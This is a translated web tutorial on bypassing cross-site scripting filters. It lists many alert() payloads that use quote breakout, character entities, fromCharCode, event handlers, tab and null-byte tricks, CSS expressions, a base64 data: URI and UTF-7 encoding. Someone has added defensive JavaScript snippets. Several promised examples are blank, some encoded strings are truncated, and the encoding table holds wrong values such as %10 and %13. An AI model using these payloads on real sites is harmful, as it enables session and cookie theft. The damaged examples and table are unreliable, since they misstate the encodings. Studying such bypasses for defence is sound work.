XSS Bypass Techniques

Source: Internet
Author: User


Cross-Site Scripting (XSS) is a type of security vulnerability that occurs in web applications. An attacker inserts code into a page through XSS so that it runs for other users who access the page, which is why XSS counts as a vulnerability: it lets the attacker bypass the site's security mechanisms and insert malicious code in a variety of ways, gaining access to sensitive pages, sessions, cookies and more. XSS is divided into three types.
 
 
XSS categories:
Non-persistent, persistent, and DOM-based (the last can be either persistent or non-persistent)
 
 
Non-persistent: non-persistent XSS, also called reflected XSS, is currently the most common type. The attacker supplies some code and the server immediately returns a page containing the result of executing it. For example, if a search term entered on a web page contains HTML tags, the search results usually display it in that form, or at least the searched string is included in the page. This can be manipulated: if the search string is not HTML-encoded, an XSS vulnerability results.
 
 
Persistent XSS: also called stored or second-order XSS, and capable of more effective attacks. It arises when data submitted by the attacker to the web application is permanently stored on the server (in a database, file system or other location); if that data is not HTML-encoded when displayed, every user who accesses the page is attacked. A typical example is an online message board that lets users submit data.
 
 
DOM-based XSS: also called local cross-site scripting, based on the Document Object Model (DOM), the standard object model for HTML/XML. This type of vulnerability occurs in client-side script on the page. For example, if a JavaScript script reads a URL request parameter and displays its value on the page without any encoding, an XSS vulnerability results. It is similar to the non-persistent kind: the attacker fills the parameter with malicious code and tricks users into clicking the modified link, and the browser then parses the parameter as HTML containing the malicious script.
 
Finding XSS vulnerabilities

 
The most common XSS test code:
 
<script>alert("XSS")</script>
 
 
When this code is injected into an input box or URL parameter it may or may not succeed. A failure does not mean the website is secure; continue testing.
Escaping the string
 
The first step is to check the source code of the current page to see whether it contains our test string. If it does, look carefully at where it landed. Here it sits inside an INPUT tag:
 
<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
 
 
In this example, we can prepend two characters to our input so that the code breaks out of the surrounding pair of single quotes:
 
'><SCRIPT>alert("XSS")</SCRIPT>
 
 
Now our code executes: by closing the preceding HTML tag we triggered the XSS. However, you may notice an extra single quotation mark displayed on the page, because the original closing single quote is now unmatched. So we modify our code again:
 
'><SCRIPT>alert("XSS")</SCRIPT><xss a='
 
 
The whole input then becomes:
 
<INPUT type="text" value=''><SCRIPT>alert("XSS")</SCRIPT><xss a=''>
 
 
OK, the JavaScript code is injected. The <xss a=''> part is meaningless and you can change it as you like, but it conforms to the HTML standard so the page does not break.
 
The filtering continues: no single quotes!
 
In the same example, suppose the administrator places a \ before every single quotation mark (and sometimes before double quotation marks too), using a function similar to addslashes. This is the escape character, and our previous code becomes:
 
<INPUT type="text" value='\'><SCRIPT>alert(\"XSS\")</SCRIPT>'>
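
Why the backslash does not help, as an added illustration that is not part of the original article: the HTML parser has no backslash escape inside attribute values, so an addslashes-style filter leaves the closing quote intact, whereas encoding the quote and angle-bracket characters as character references keeps the whole payload inside the attribute value. The function names below are my own; the payload is the one from the article.

```javascript
// Added example (not from the original article): an addslashes-style filter
// versus HTML attribute encoding, judged the way the HTML parser would.

// Backslash escaping, as the article's administrator applied it.
function addslashes(s) {
  return String(s).replace(/['"\\]/g, c => "\\" + c);
}

// Context-aware encoding for a value placed inside a quoted HTML attribute:
// every character that could end the attribute or start markup becomes a
// numeric character reference, which the parser decodes only as text.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[&<>"'\/]/g, c => "&#x" + c.charCodeAt(0).toString(16) + ";");
}

// Rebuild the article's <INPUT value='...'> line with a chosen filter.
function renderInput(userValue, filter) {
  return "<INPUT type=\"text\" value='" + filter(userValue) + "'>";
}

// Mimic the parser: the attribute value runs from the opening ' to the next ';
// whatever follows that quote is markup. Returns what lands outside the attribute.
function markupAfterValue(html) {
  const start = html.indexOf("value='") + "value='".length;
  const end = html.indexOf("'", start);   // a preceding backslash does not skip this quote
  return html.slice(end + 1);
}

// Payload from the article, constructed here as the test input.
const PAYLOAD = "'><SCRIPT>alert(\"XSS\")</SCRIPT><xss a='";

// True when the filter lets the <SCRIPT> tag land outside the attribute.
function scriptEscapesAttribute(filter) {
  return markupAfterValue(renderInput(PAYLOAD, filter)).includes("<SCRIPT>");
}
```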
 
 
There are several ways to continue, depending on how the filter function is written. One is to use character entities. Anyone who has learned HTML knows that some special characters are written as fixed symbol combinations: for example, you cannot use < and > to mean less than and greater than, because they are interpreted as an HTML tag. If you need them, you can use the following instead:
 

Numeric   Named    Character   Meaning
&#34;     &quot;   "           double quotation mark
&#38;     &amp;    &           ampersand
&#60;     &lt;     <           less-than sign
&#62;     &gt;     >           greater-than sign
 
 
Use &quot; or &#34; in place of our double quotation marks. Sometimes this bypasses the filter. Example:

<script>alert("XSS")</script>
<script>alert(&quot;XSS&quot;)</script>

<script>alert(&#34;XSS&#34;)</script>
 
If all of these are filtered out, we can use JavaScript's String.fromCharCode function, which converts the specified Unicode values into a string.
 
For example:
 
<script>alert("XSS")</script>

<script>alert(String.fromCharCode(88,83,83))</script>

<INPUT type="text" value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'>
 
 
 
You can use the MySQL char() function to convert characters to their character codes; just use whichever characters you like.
There are also many transcoding tools.
 
Bypassing the <script> filter
 
Some filters remove the <script> tag, so the examples above are discarded. There is still a way to insert JavaScript.
Let's look at an event-handler example.
 
<BODY onload="alert('xss')">
 
 
In HTML, onload is an event. No other tag has this attribute, but the BODY tag does. There is a limitation, however: if an onload event has already been handled before your code, yours will not be triggered. Never mind; we can look at onerror event handling instead.
 

 
 
Note that no image is specified, so an error occurs and the onerror event fires. The XSS is triggered without using the <script> tag.
 
Using the IMG source
 
The img and a href tags, the most commonly used in HTML, are generally not filtered. One specifies an image and the other a hyperlink; the most dangerous is the img tag. The following are some examples:
Standard Format:
 

 
 
No double quotation marks or semicolons:

 
 
Double quotation marks and <script> are filtered:
 

 
 
Use CharCode to bypass Filtering:
 

 
 
Experienced attackers can also convert all of the preceding code into the equivalent ASCII codes:
 
1;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
 
 
You can try it with an ASCII table yourself. Converting to hexadecimal is also possible:
 
;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;>
 
 
Tab characters, line breaks and carriage returns
 
These symbols can be used to fool the filter.
 

 
The preceding example uses the minimal hexadecimal form of a tab to fool the filter; the final output is unchanged.
 

 
 
 
Type                     Horizontal Tab   New Line      Carriage Return
URL                      %09              %10           %13
Minimal Sized Hex        &#x9             &#xA          &#xD
Maximum Sized Hex        &#x0000009;      &#x000000A;   &#x000000D;
Minimum Sized Decimal    &#9              &#10          &#13
Maximum Sized Decimal    &#X0000009;      &#X0000009;   &#0000009;
 
 
Using null characters

Another bypass option is the null character, which is the most effective tool.
 
Here is an example:
<SCR%00IPT>alert("XSS")</SCRIPT>
 
 
The NULL character (%00) prevents the filter from seeing the complete <SCRIPT> tag. This works only in IE 6.0 and IE 7.0.
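
A defensive check for URL-valued attributes such as href and src, covering the character-reference, tab/newline/carriage-return and null tricks from the sections above; this is an added example rather than the article's own code. It decodes what the browser would decode, strips what the browser would strip, and only then allows a short list of schemes, instead of searching the raw string for "javascript:" as the filters being bypassed do. Function names are mine and the sample inputs are constructed from the article's payloads.

```javascript
// Added example (not from the original article): normalize a URL attribute the
// way a browser would before deciding whether its scheme is acceptable.
const NAMED = { amp: "&", lt: "<", gt: ">", quot: "\"", apos: "'", tab: "\t", newline: "\n" };

// Decode decimal (&#9;), hex (&#x9;, any number of leading zeros, optional ';')
// and the common named references. Unknown references are left untouched.
function decodeCharRefs(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (name !== undefined) return NAMED[name.toLowerCase()] ?? m;
    const cp = parseInt(hex !== undefined ? hex : dec, hex !== undefined ? 16 : 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Browsers drop tab, LF and CR anywhere in a URL, and the article notes that
// old IE also ignored NUL (%00 decodes to a real NUL), so remove all of them.
function normalizeUrl(value) {
  return decodeCharRefs(value).replace(/[\t\n\r\0]/g, "").trim().toLowerCase();
}

// Allowlist of schemes; a value with no scheme (a relative URL) is fine.
function isSafeUrl(value) {
  const m = /^([a-z][a-z0-9+.\-]*):/.exec(normalizeUrl(value));
  return m === null || ["http", "https", "mailto"].includes(m[1]);
}

// The kind of blocklist the article bypasses: it inspects the raw string only.
function naiveBlocklistAllows(value) {
  return !value.toLowerCase().includes("javascript:");
}

// Constructed inputs mirroring the article's tricks.
const SAMPLES = {
  plain:   "https://example.com/page",
  tab:     "jav&#x09;ascript:alert('xss')",    // minimal hex tab
  decimal: "&#106;avascript:alert('xss')",     // first letter as a decimal reference
  zeros:   "java&#x0000009;script:alert('xss')", // maximum-size hex tab
};
```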
 
Double quotation mark bug
 
Bypassing this filter means finding the closing tag and constructing input that breaks out of it.
 
For example:
 
<SCRIPT>alert('xsss')</SCRIPT>">
 
We usually think that in the img tag the first two quotation marks are treated as a pair and do nothing, and the next quotation mark matches the last one. But that is not the case, and all browsers are trying to fix this problem.
 
The result is as follows:
 
<script>alert('xss')</script>"&gt;
 
Bypassing CSS filters
 
HTML tags are useful for inserting JavaScript, but CSS can be used as well. There are many ways to insert XSS into CSS, which gives still more methods of attack. The first is to put the XSS code in the href attribute referenced by a LINK element.
 
<LINK rel="stylesheet" HREF="javascript:alert('xss');">
 
 
IE7 no longer allows this, but Opera and IE6 do. The other method uses the <STYLE> tag, which is not very common; it generally applies to forums that allow users to design their own style source.
 
<STYLE>a{width:expression(alert('xss'))}</STYLE>
 
There is another way:

<DIV style="width:expression(alert('xss'));">
 
 
 
Incomplete filters
 
Let's look at what the developer might be thinking: is it safe now? No. We can still insert code through the data: URI (I saw this some time ago and forget the exact translation). We base64-encode
<script>alert('xss')</script>.
 
 
 
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

The data: URI lets us pack a complete document into a single string. It can be used in Firefox and other browsers; no specific usage is given here. If you need both double and single quotation marks, use some unusual constructions.
 

Escape characters
 
Escape characters are sometimes useful and can be used to deal with some simple filters.

 
The result is as follows:
 

 
 
 
Encoding
 
Using UTF-7 encoding can bypass filters.
 
For example
 
<script>alert("XSS")</script>
 
After using UTF-7 encoding:
 
+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
 
Then every plus sign has to be changed to %2B, otherwise the browser will interpret them as connectors.
 
%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-
 
A list of URL encodings:

Character   URL encoding
Space       %20
/           %2F
"           %22
?           %3F
+           %2B
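
To see why the UTF-7 trick works, and why declaring the response charset (for example Content-Type: text/html; charset=utf-8) defeats it, here is a small UTF-7 decoder; it is an added example, not the article's code, and turns the encoded strings above back into the markup that a browser left to guess the charset would render. Function names are mine; the two inputs are the article's own.

```javascript
// Added example (not from the original article): decode the article's UTF-7
// strings to show what a charset-guessing browser would see. The defence is to
// declare the charset explicitly so the browser never has to guess.
const B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// UTF-7 writes reserved characters as "+<modified base64 of UTF-16BE>-";
// the sequence "+-" stands for a literal plus sign.
function decodeUtf7(s) {
  return s.replace(/\+([A-Za-z0-9+/]*)-?/g, (_, b64) => {
    if (b64 === "") return "+";
    let bits = 0, nbits = 0, out = "";
    for (const ch of b64) {
      bits = (bits << 6) | B64.indexOf(ch);
      nbits += 6;
      if (nbits >= 16) {                 // a full UTF-16 code unit is available
        nbits -= 16;
        out += String.fromCharCode((bits >> nbits) & 0xffff);
        bits &= (1 << nbits) - 1;        // keep only the leftover padding bits
      }
    }
    return out;
  });
}

// The article percent-encodes '+' as %2B (and parentheses as %28/%29) so the
// string survives the URL; undo that first, then decode the UTF-7.
function decodeUrlThenUtf7(s) {
  return decodeUtf7(decodeURIComponent(s));
}

// Inputs taken from the article.
const UTF7_BODY = "+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-";
const UTF7_URL  = "%2BADw-script%2BAD4-alert%281%29%2BADw-/script%2BAD4-";
```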
 
 
OK, that's it.
